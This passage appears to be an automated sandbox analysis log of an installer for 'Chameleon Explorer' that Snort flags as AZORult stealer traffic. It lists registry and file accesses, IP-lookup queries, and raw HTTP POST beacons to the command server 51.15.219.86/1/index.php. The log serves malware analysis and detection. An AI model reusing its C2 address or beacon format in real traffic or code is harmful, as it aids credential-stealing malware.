                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.iniJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0560A504 FindFirstFileW,2_2_0560A504
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 16_2_0340A504 FindFirstFileW,16_2_0340A504

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49708 -> 51.15.219.86:80
                      Source: TrafficSnort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49709 -> 51.15.219.86:80
                      May check the online IP address of the machine
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeDNS query: name: iplogger.org
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: GET /1dHC37 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 2no.co
                      Source: global trafficHTTP traffic detected: GET /unknown/2no.co/1dHC37/unknown HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: iplogger.org
                      Source: global trafficHTTP traffic detected: POST /1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 51.15.219.86Content-Length: 109Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 3f 2f fb 3e 2f fb 3c 2f fb 3f 2f fb 34 4e 8b 28 38 8c 28 39 ff 28 39 ff 28 39 f8 28 39 fa 28 39 fe 28 39 fd 28 39 f9 4c 2f fb 34 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/?/>/</?/4N(8(9(9(9(9(9(9(9L/4
                      Source: global trafficHTTP traffic detected: POST /1/index.php HTTP/1.0Host: 51.15.219.86Connection: closeUser-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Content-Length: 109Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 3f 2f fb 3e 2f fb 3c 2f fb 3f 2f fb 34 4e 8b 28 38 8c 28 39 ff 28 39 ff 28 39 f8 28 39 fa 28 39 fe 28 39 fd 28 39 f9 4c 2f fb 34 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/?/>/</?/4N(8(9(9(9(9(9(9(9L/4
                      Source: Joe Sandbox ViewIP Address: 148.251.234.83 148.251.234.83
                      Source: Joe Sandbox ViewIP Address: 148.251.234.83 148.251.234.83
                      Source: update.exe, 00000014.00000003.410083887.00000000069B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://51.15.219.86/1/index.php
                      Source: cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://aia.startssl.com/certs/ca.crt0
                      Source: cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://aia.startssl.com/certs/sca.code2.crt06
                      Source: cexplorer.exe, 00000001.00000003.266890052.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.401105982.00000000021B6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.268710353.0000000003250000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://counter-strike.com.ua/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.384294738.00000000048D9000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336526085.00000000048BB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337052630.00000000048D3000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.342430878.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000006.00000002.326211855.000000000152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://crl.startssl.com/sca-code2.crl0#
                      Source: cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://crl.startssl.com/sfsca.crl0f
                      Source: cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
                      Source: cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://ocsp.startssl.com00
                      Source: cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://ocsp.startssl.com07
                      Source: cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://ocsp.thawte.com0
                      Source: cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                      Source: cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://s.symcd.com06
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.341900719.0000000004919000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336985372.0000000004918000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schema.org
                      Source: cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                      Source: cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                      Source: cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                      Source: cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                      Source: cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                      Source: cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                      Source: cexplorer.tmp, 00000002.00000003.268710353.0000000003250000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.384784630.0000000005502000.00000004.00000020.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.chameleon-managers.com
                      Source: ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.chameleon-managers.com/contacts.php?program=
                      Source: ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.chameleon-managers.com/contacts.php?utm_source=program&utm_medium=question&utm_campaign=
                      Source: ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.chameleon-managers.com/reg.php?program=
                      Source: ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.chameleon-managers.com/subscription/?action=extend&key=
                      Source: ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.chameleon-managers.com/subscription/?action=latest&key=
                      Source: ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.chameleon-managers.com/windows-explorer/embed/H
                      Source: ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.chameleon-managers.com/windows-explorer/extensions.phpH
                      Source: cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3
                      Source: cexplorer.tmp, 00000002.00000003.380132224.00000000034BA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3&
                      Source: cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3V$mP$mP
                      Source: cexplorer.exe, 00000001.00000003.401105982.00000000021B6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3Y4=A4=AhXInno
                      Source: cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3_lmPlmP
                      Source: cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3c
                      Source: cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3d
                      Source: cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3e
                      Source: cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3f
                      Source: cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3g
                      Source: cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3h
                      Source: cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3j
                      Source: cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3l
                      Source: cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3t
                      Source: cexplorer.exe, 00000001.00000003.266890052.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.268710353.0000000003250000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.comBhttp://www.chameleon-managers.comBhttp://www.chameleon-managers.co
